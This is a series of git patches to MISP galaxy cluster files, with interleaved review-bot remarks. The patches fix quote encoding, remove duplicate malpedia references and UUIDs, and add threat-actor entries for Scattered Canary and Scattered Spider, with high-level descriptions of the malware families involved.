@@ -48418,7 +48418,7 @@ "value": "swen" }, { - "description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim\u2019s Active Directory environment.", + "description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim’s Active Directory environment.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swiftslicer", @@ -48942,7 +48942,7 @@ "value": "TeamSpy" }, { - "description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.", + "description": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop", 
@@ -49740,7 +49740,7 @@ "value": "tomiris" }, { - "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files \u2013 temp.txt and temp2.txt \u2013 within the same directory of its execution.", + "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf", 
@@ -51133,7 +51133,7 @@ "value": "Unidentified 078 (Zebrocy Nim Loader?)" }, { - "description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a target\u2019s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.", + "description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080", 
@@ -52366,7 +52366,7 @@ "value": "Vulturi" }, { - "description": "Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.\r\n\r\nIt uses a simple XOR for encryption of its configuration and network traffic. \r\n\r\nIt sends detailed information about the victim's environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.\r\n\r\nIt supports more than 20 commands that include operations on the victim\u2019s filesystem, basic process management, command line execution, file exfiltration, and the download and memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. Also, it can monitor newly connected drives and the number of logged-on users.\r\n\r\nIt has MPRD.dll as the internal DLL name, and a single export SamIInitialize.\r\n\r\nVyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.", + "description": "Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.\r\n\r\nIt uses a simple XOR for encryption of its configuration and network traffic. \r\n\r\nIt sends detailed information about the victim's environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.\r\n\r\nIt supports more than 20 commands that include operations on the victim’s filesystem, basic process management, command line execution, file exfiltration, and the download and memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). 
As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. Also, it can monitor newly connected drives and the number of logged-on users.\r\n\r\nIt has MPRD.dll as the internal DLL name, and a single export SamIInitialize.\r\n\r\nVyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva", @@ -52513,7 +52513,7 @@ "value": "WastedLoader" }, { - "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim\u2019s name and the string \u2018wasted\u2019. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", + "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker", 
@@ -53807,7 +53807,7 @@ "value": "X-Tunnel (.NET)" }, { - "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", + "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", @@ -54078,7 +54078,7 @@ "value": "YourCyanide" }, { - "description": "According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when it\u2019s executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.", + "description": "According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when it’s executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ytstealer", @@ -54825,4 +54825,4 @@ } ], "version": 19000 -} +} From b79b75dba4140da7a703fe9450f65877868f13a5 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Tue, 26 Sep 2023 10:58:46 +0200 Subject: [PATCH 05/16] chg: [malpedia] duplicate refs removed --- clusters/malpedia.json | 12 +----------- 1 file changed, 1 insertion(+), 11 deletions(-) 
diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 29d50a2..71dfe47 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -7048,7 +7048,6 @@ "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf", "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment", "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt", "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/", "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera", "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials", @@ -11695,7 +11694,6 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader", "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader" ], "synonyms": [], @@ -11847,7 +11845,6 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002", "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002" ], "synonyms": [], @@ -11860,7 +11857,6 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003", "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003" ], "synonyms": [], 
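Review bot: The line removed in the `py.pyaesloader` hunk is an exact, adjacent copy of the line kept below it, and the same shape repeats for `py.unidentified_002` and `py.unidentified_003` on this line, which suggests the refs list was emitted twice by whatever generated these clusters rather than by hand. Fixing the instances individually leaves the next regeneration free to reintroduce them; a uniqueness check on `meta.refs` in the galaxy validation, or a dedup pass in the generator, would make the cleanup stick. The TeamTNT hunk above removes a malpedia URL from the middle of its list, so the surviving copy is presumably elsewhere in that entry — outside this hunk, so it cannot be confirmed here.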
@@ -22169,7 +22165,6 @@ "https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/", "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat", "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader", "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses", "https://securityintelligence.com/posts/email-campaigns-leverage-updated-dbatloader-deliver-rats-stealers/", "https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html", @@ -25523,7 +25518,6 @@ "description": "FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations. \r\n", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader", "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader" ], "synonyms": [], @@ -28033,8 +28027,7 @@ "https://cert.gov.ua/article/38374", "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", "https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel" + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya" ], "synonyms": [], "type": [] 
@@ -30075,7 +30068,6 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart", "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart" ], "synonyms": [ @@ -31774,7 +31766,6 @@ "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer", "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ @@ -45960,7 +45951,6 @@ "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html", "https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/", - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", "https://s.tencent.com/research/report/479.html", "https://s.tencent.com/research/report/659.html", "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", From 67543e2437ff10f5a070c1e11bbd77876bf0c39c Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Tue, 26 Sep 2023 11:17:44 +0200 Subject: [PATCH 06/16] chg: [galaxy] duplicate UUIDs removed --- clusters/malpedia.json | 132 ----------------------------------------- 1 file changed, 132 deletions(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 71dfe47..b1d9303 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json 
@@ -3029,18 +3029,6 @@ "uuid": "55626b63-4b9a-468e-92ae-4b09b303d0ed", "value": "Unidentified APK 004" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005" - ], - "synonyms": [], - "type": [] - }, - "uuid": "084ebca7-91da-4d9c-8211-a18f358ac28b", - "value": "Unidentified APK 005" - }, { "description": "Information stealer posing as a fake banking app, targeting Korean users.", "meta": { @@ -34004,22 +33992,6 @@ "uuid": "db4ca498-5481-4b68-8024-edd51d552c38", "value": "Makop" }, - { - "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware", - "https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11", - "https://lifars.com/wp-content/uploads/2021/08/Makop-Ransomware-Whitepaper-case-studyNEW-1.pdf", - "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", - "https://twitter.com/siri_urz/status/1221797493849018368" - ], - "synonyms": [], - "type": [] - }, - "uuid": "db4ca498-5481-4b68-8024-edd51d552c38", - "value": "Makop Ransomware" - }, { "description": "According to PCrisk, Maktub is ransomware distributed via zipped Word documents. Once the file is extracted and opened, Maktub infiltrates the system and encrypts files stored on the victim's computer. Maktub ransomware adds a .NORV, .gyul (or other random) extension to each file encrypted, thus, making it straightforward to determine which files are encrypted.", "meta": { 
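Review bot: Dropping the second `db4ca498-5481-4b68-8024-edd51d552c38` entry fixes the UUID collision, but the removed `Makop Ransomware` cluster was the one carrying a description and four non-malpedia references (the medium write-up, the LIFARS whitepaper, the Microsoft blog and the tweet), none of which appear in the surviving `Makop` entry visible above it. Unless they were merged in a hunk outside this view, the fix loses sourcing; those URLs should be appended to the kept entry's `refs` and `"Makop Ransomware"` added to its `synonyms` so lookups by the old value still resolve. The `Unidentified APK 005` removal in the first hunk is in the same position, with its colliding partner not visible.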
@@ -48033,19 +48005,6 @@ "uuid": "129163aa-8539-40ee-a627-0ac6775697b5", "value": "SUGARRUSH" }, - { - "description": "According to Mandiant, SUGARUSH is a backdoor written to establish a connection with an embedded C2 and to execute CMD commands.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sugarush", - "https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping" - ], - "synonyms": [], - "type": [] - }, - "uuid": "129163aa-8539-40ee-a627-0ac6775697b5", - "value": "SUGARUSH" - }, { "description": "FireEye describes SUNBURST as a trojanized SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website.", "meta": { 
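Review bot: The removed `SUGARUSH` entry carries the Mandiant reference and a description, while the kept `SUGARRUSH` entry with the same UUID `129163aa-8539-40ee-a627-0ac6775697b5` shows neither in the hunk; merging the Mandiant URL into the kept entry's `refs` and adding `"SUGARUSH"` to its `synonyms` would preserve both. The removed spelling also matches the malpedia slug in its own reference (`win.sugarush`), so it is worth checking which spelling is the canonical value before deciding which of the two entries survives.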
@@ -48896,20 +48855,6 @@ "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", "value": "TDTESS" }, - { - "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot" - ], - "synonyms": [ - "FINTEAM" - ], - "type": [] - }, - "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433", - "value": "TeamBot" - }, { "description": "", "meta": { @@ -50938,18 +50883,6 @@ "uuid": "bab52335-be9e-4fad-b68e-f124b0d69bbc", "value": "Unidentified 058" }, - { - "description": "Was previously wrongly tagged as PoweliksDropper, now looking for additional context.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061" - ], - "synonyms": [], - "type": [] - }, - "uuid": "969d1054-b917-4fb8-b3f8-1e33926fdb65", - "value": "Unidentified 061 (Windows)" - }, { "description": "This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.", "meta": { 
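Review bot: The deleted `TeamBot` cluster (uuid `045469d0-5bb2-4ed9-9ee2-a0a08f437433`) is the only entry in the hunk carrying the `FINTEAM` synonym and the Check Point description, and the entry it collides with is not visible, so whether that content survives cannot be confirmed from this diff. If the kept entry lacks it, `"FINTEAM"` should be added to its `synonyms` — correlation works on value and synonyms, so dropping an alias silently breaks matching on that name. The `Unidentified 061 (Windows)` removal in the second hunk on this line is in the same position.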
@@ -51041,19 +50974,6 @@ "uuid": "f2979fee-603d-496e-a526-d622e9cba84f", "value": "Unidentified 072 (Metamorfo Loader)" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073", - "https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "f049e626-7de2-4648-81db-53dfd34f2fab", - "value": "Unidentified 073 (Charming Kitten)" - }, { "description": "", "meta": { @@ -51200,32 +51120,6 @@ "uuid": "d7f1e6cf-1880-426a-881a-619309f32c37", "value": "Unidentified 088 (Nim Ransomware)" }, - { - "description": "Downloader used in suspected APT attack against Vietnam.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089" - ], - "synonyms": [ - "5.t Downloader" - ], - "type": [] - }, - "uuid": "685c9c30-aa9f-43ee-a262-43c17c350049", - "value": "Unidentified 089 (Downloader)" - }, - { - "description": "Recon/Loader malware attributed to Lazarus, disguised as Notepad++ shell extension.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_090" - ], - "synonyms": [], - "type": [] - }, - "uuid": "565de3f5-7eb7-43ca-a9d9-b588dfd6a50a", - "value": "Unidentified 090 (Lazarus)" - }, { "description": "Avast found this unidentified RAT, which abuses a code-signing certificate by the Philippine Navy. It is statically linked against OpenSSL 1.1.1g.", "meta": { 
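Review bot: The three entries removed on this line each carry data that nothing visible in the hunks retains: `Unidentified 073` has the Certfa Charming Kitten reference, `Unidentified 089` has the `5.t Downloader` synonym, and `Unidentified 090` has the Lazarus/Notepad++ description. Removing the duplicate UUID is right, but the keep/drop choice should favour, or merge into, the entry with the richer metadata; as shown, the reference and the synonym disappear unless the colliding entries outside this view already hold them.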
@@ -51368,32 +51262,6 @@ "uuid": "0ee92ce5-e33d-4393-a466-6b5f6a1ca6a5", "value": "Unidentified 100 (APT-Q-12)" }, - { - "description": "Potential Lazarus sample.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101", - "https://twitter.com/RedDrip7/status/1595365451495706624", - "https://securelist.com/bluenoroff-methods-bypass-motw/108383/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "cca4f240-ac69-437e-b02a-5483ebef5087", - "value": "Unidentified 101 (Lazarus?)" - }, - { - "description": "Donot malware is a sophisticated, high-level malware toolkit designed to collect and exfiltrate information from vulnerable systems. It has been used in targeted attacks against government and military organizations in Asia. Donot malware is highly complex and well-crafted, and it poses a serious threat to information security.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102" - ], - "synonyms": [], - "type": [] - }, - "uuid": "6d22d9e1-b38d-4a6f-a4bb-1121ced4adfc", - "value": "Unidentified 102 (Donot)" - }, { "description": "A malware that uses .NET to load unmanaged (shell)code which has some resemblance to BADHATCH, the IP found in the sample was referred to in coverage on WHITERABBIT ransomware attacks.", "meta": { From e393780af898cbfe02804ee92df29295106311b0 Mon Sep 17 00:00:00 2001 From: Mathieu Beligon Date: Mon, 2 Oct 2023 15:11:10 +0200 Subject: [PATCH 07/16] [threa-actors] Add Scattered Canary --- clusters/threat-actor.json | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 60e1cae..ff32c7b 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json 
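Review bot: `Unidentified 101 (Lazarus?)` is removed together with its two external references (the RedDrip7 tweet and the Securelist BlueNoroff MotW write-up), and `Unidentified 102 (Donot)` with its description; the entries that share their UUIDs are not in the hunk. If those are bare placeholders, they should inherit these refs and descriptions before the removal lands, otherwise the galaxy regresses in sourcing while fixing the UUID collision.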
@@ -11766,6 +11766,19 @@
 ],
 "uuid": "8cb6f57b-9ebb-45a6-a89f-9efdb8065d70",
 "value": "Storm-0324"
+ },
+ {
+ "description": "When the first member of Scattered Canary, who, for the purposes of this report, we call\nAlpha, began his operations, he was a lone wolf—working mostly Craigslist scams as he learned\nthe tricks of the trade from a mentor. However, within a few years, he had honed his craft\nenough to expand into romance scams, where he met his first “employee,” Beta. Once they\nhad secured enough mules via their romance scams to launder their stolen money, they shifted\nfrom targeting individuals to targeting enterprises, and the group’s BEC operation was born.",
+ "meta": {
+ "country": "Nigeria",
+ "motive": "Cybercrime",
+ "references": [
+ "https://cofense.com/blog/gift-card-fraud-ecosystem-shifts-what-paxfuls-closing-means-for-business-email-compromise/",
+ "https://static.fortra.com/agari/pdfs/guide/ag-scattered-canary-gd.pdf",
+ "https://www.agari.com/blog/covid-19-unemployment-fraud-cares-act?_gl=1%2Ayzg6ns%2A_ga%2AMTkyMzIyOTI4MC4xNjk2MjUyMDA2%2A_ga_NHMHGJWX49%2AMTY5NjI1MjAwNS4xLjAuMTY5NjI1MjAwNS42MC4wLjA.&utm_source=press-release&utm_medium=prnewswire&utm_campaign=scattered20"
+ ]
+ },
+ "value": "Scattered Canary"
 }
 ],
 "version": 282
From b8f8fce4b61a88b4a8444814dee382c5d31a7073 Mon Sep 17 00:00:00 2001
From: Mathieu Beligon
Date: Mon, 2 Oct 2023 15:17:40 +0200
Subject: [PATCH 08/16] [threa-actors] Add Scattered Spider
---
 clusters/threat-actor.json | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index ff32c7b..5e50119 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
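Review bot: The `description` is a verbatim passage from the Agari report, including its hard line breaks (`\n` inside `we call\nAlpha`) and the report-internal framing "for the purposes of this report, we call Alpha", which reads wrongly in a galaxy entry; a one- or two-sentence summary (a Nigerian BEC group that grew out of Craigslist and romance scams, per Agari) is what consumers expect. The third reference URL carries Google Analytics and UTM tracking parameters (`_gl=…`, `utm_source=…`); strip them to the plain path, since the tokens identify the session that copied the link and add nothing to the citation. This file also uses both `refs` (e.g. the TA505 entry) and `references` for the same concept; tooling that reads `meta.refs` will not see the links under `references`.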
@@ -11779,6 +11779,40 @@
 ]
 },
 "value": "Scattered Canary"
+ },
+
+ {
+ "description": "Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, with the number of victims steadily increasing.",
+ "meta": {
+ "country": "",
+ "references": [
+ "https://www.cybersecurity-insiders.com/scattered-spider-managed-mgm-resort-network-outage-brings-8m-loss-daily/",
+ "https://www.loginradius.com/blog/identity/oktapus-phishing-targets-okta-identity-credentials/"
+ ],
+ "synonyms": [
+ "UNC3944",
+ "Muddled Libra",
+ "Oktapus",
+ "Scattered Swine"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "value": "Scattered Spider"
 }
 ],
 "version": 282
From 0fba8d3f277780d072bea318ffc0eb086d2fc2fb Mon Sep 17 00:00:00 2001
From: Mathieu Beligon
Date: Mon, 2 Oct 2023 15:19:20 +0200
Subject: [PATCH 09/16] [threat-actors] bump version
---
 clusters/threat-actor.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 5e50119..eebb0ba 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -11815,5 +11815,5 @@
 "value": "Scattered Spider"
 }
 ],
- "version": 282
+ "version": 283
 }
From b2599deaae43b72873eae8c3602d925a303245c3 Mon Sep 17 00:00:00 2001
From: Mathieu Beligon
Date: Mon, 2 Oct 2023 19:17:47 +0200
Subject: [PATCH 10/16] fixes
---
 clusters/threat-actor.json | 17 -----------------
 1 file changed, 17 deletions(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index eebb0ba..879332d 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
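Review bot: Before this entry lands it is worth checking that threat-actor.json does not already hold a cluster for `UNC3944`, `Muddled Libra` or `0ktapus` as a value or synonym — the later commits in this series are removing duplicate UUIDs from malpedia.json, and a second Scattered Spider cluster would recreate the same correlation problem one file over. The two references are secondary coverage (a news site and a vendor marketing blog); since every listed synonym is a vendor tracking name, the vendor reports that introduced them are the better primary citations. The Okta-themed alias is usually written `0ktapus` with a leading zero; if both spellings circulate, list both so name matching does not miss one.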
@@ -11784,7 +11784,6 @@
 {
 "description": "Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, with the number of victims steadily increasing.",
 "meta": {
- "country": "",
 "references": [
 "https://www.cybersecurity-insiders.com/scattered-spider-managed-mgm-resort-network-outage-brings-8m-loss-daily/",
 "https://www.loginradius.com/blog/identity/oktapus-phishing-targets-okta-identity-credentials/"
@@ -11796,22 +11795,6 @@
 "Scattered Swine"
 ]
 },
- "related": [
- {
- "dest-uuid": "",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "uses"
- }
- ],
 "value": "Scattered Spider"
 }
 ],
From 081b2e619b4a8ee0a7f0c9a3557ede56c9a7e066 Mon Sep 17 00:00:00 2001
From: Mathieu Beligon
Date: Mon, 2 Oct 2023 19:18:00 +0200
Subject: [PATCH 11/16] fixes
---
 clusters/threat-actor.json | 1 -
 1 file changed, 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 879332d..0065292 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -11780,7 +11780,6 @@
 },
 "value": "Scattered Canary"
 },
-
 {
 "description": "Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, with the number of victims steadily increasing.",
 "meta": {
From e6266e8e59fbb3a18c09880d2e7dc213fb06627e Mon Sep 17 00:00:00 2001
From: Mathieu Beligon
Date: Mon, 2 Oct 2023 19:25:10 +0200
Subject: [PATCH 12/16] fixes
---
 clusters/threat-actor.json | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 0065292..5d1f1c7 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -11778,6 +11778,7 @@
 "https://www.agari.com/blog/covid-19-unemployment-fraud-cares-act?_gl=1%2Ayzg6ns%2A_ga%2AMTkyMzIyOTI4MC4xNjk2MjUyMDA2%2A_ga_NHMHGJWX49%2AMTY5NjI1MjAwNS4xLjAuMTY5NjI1MjAwNS42MC4wLjA.&utm_source=press-release&utm_medium=prnewswire&utm_campaign=scattered20"
 ]
 },
+ "uuid": "fde2d0f9-ed23-4cdc-96d3-f0a01f804707",
 "value": "Scattered Canary"
 },
 {
@@ -11794,6 +11795,7 @@
 "Scattered Swine"
 ]
 },
